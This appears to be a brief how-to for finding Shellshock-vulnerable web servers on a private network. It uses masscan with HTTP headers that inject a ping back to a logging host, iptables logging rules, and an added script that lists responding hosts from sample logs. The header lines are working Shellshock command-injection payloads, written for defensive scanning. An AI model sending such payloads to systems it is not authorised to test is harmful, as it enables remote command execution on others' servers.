How to scan for Shellshock


cd /root
sudo apt-get install git gcc make libpcap-dev
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make

Then I copied this into a file, shellshock.conf:


range = 172.16.1.1-172.16.1.254
port = 80
banners = true
http-user-agent = shellshock-scan
http-header = Cookie:() { :; }; ping -c 3 172.16.1.217
http-header = Host:() { :; }; ping -c 3 172.16.1.217
http-header = Referer:() { :; }; ping -c 3 172.16.1.217

Then I ssh’ed to 172.16.1.217 and added this to my /etc/iptables.rules file:


-N LOGGING
-A LOGGING -m limit --limit 200/min -j LOG --log-prefix "SHELLSHOCK: " --log-level 7
-A LOGGING -j RETURN
-A INPUT -s 172.16.1.0/24 -p icmp --icmp-type echo-request -j LOGGING

I tested by pinging it, and it logged.

Then I ran /root/masscan/bin/masscan -c shellshock.conf
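
Reading the result, as an added example that is not part of the original post: any host that executed the injected ping shows up as a SRC= address in the "SHELLSHOCK: " log lines on 172.16.1.217. The function names and the sample log lines are constructed for illustration, and the log layout assumed is the usual iptables LOG format.

```shell
#!/bin/sh
# Added example (not from the original post): list the hosts whose pings were
# logged by the "SHELLSHOCK: " iptables rule, with a hit count per host.
# Function names and the sample lines below are constructed for illustration.

# shellshock_hosts [LOGFILE]  -- reads LOGFILE, or stdin when omitted.
shellshock_hosts() {
    awk '
        # Only ICMP echo-requests carrying the log prefix are counted.
        /SHELLSHOCK: / && /PROTO=ICMP/ && / TYPE=8 / {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^SRC=/) { hits[substr($i, 5)]++; break }
        }
        END { for (ip in hits) printf "%s %d\n", ip, hits[ip] }
    ' "${1:--}" | sort -t . -k1,1n -k2,2n -k3,3n -k4,4n
}

# Constructed kernel log lines in the usual iptables LOG layout.
sample_log() {
    cat <<'EOF'
Sep 26 10:15:01 listener kernel: [100.1] SHELLSHOCK: IN=eth0 OUT= SRC=172.16.1.40 DST=172.16.1.217 LEN=84 TTL=64 PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=1
Sep 26 10:15:01 listener kernel: [100.2] SHELLSHOCK: IN=eth0 OUT= SRC=172.16.1.23 DST=172.16.1.217 LEN=84 TTL=64 PROTO=ICMP TYPE=8 CODE=0 ID=9 SEQ=1
Sep 26 10:15:02 listener kernel: [101.1] SHELLSHOCK: IN=eth0 OUT= SRC=172.16.1.40 DST=172.16.1.217 LEN=84 TTL=64 PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=2
Sep 26 10:15:02 listener kernel: [101.2] SHELLSHOCK: IN=eth0 OUT= SRC=172.16.1.23 DST=172.16.1.217 LEN=84 TTL=64 PROTO=ICMP TYPE=8 CODE=0 ID=9 SEQ=2
Sep 26 10:15:03 listener kernel: [102.1] OTHER: IN=eth0 OUT= SRC=172.16.1.99 DST=172.16.1.217 LEN=60 TTL=64 PROTO=TCP SPT=4242 DPT=22
Sep 26 10:15:03 listener kernel: [102.2] SHELLSHOCK: IN=eth0 OUT= SRC=172.16.1.23 DST=172.16.1.217 LEN=84 TTL=64 PROTO=ICMP TYPE=8 CODE=0 ID=9 SEQ=3
EOF
}

# Demo run on the constructed sample; on the listener, pass the real log file.
sample_log | shellshock_hosts
```

Each address listed ran the ping from the injected header, so that host's bash needs updating. A manual test ping like the one above is logged by the same rule and will appear in the list too.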
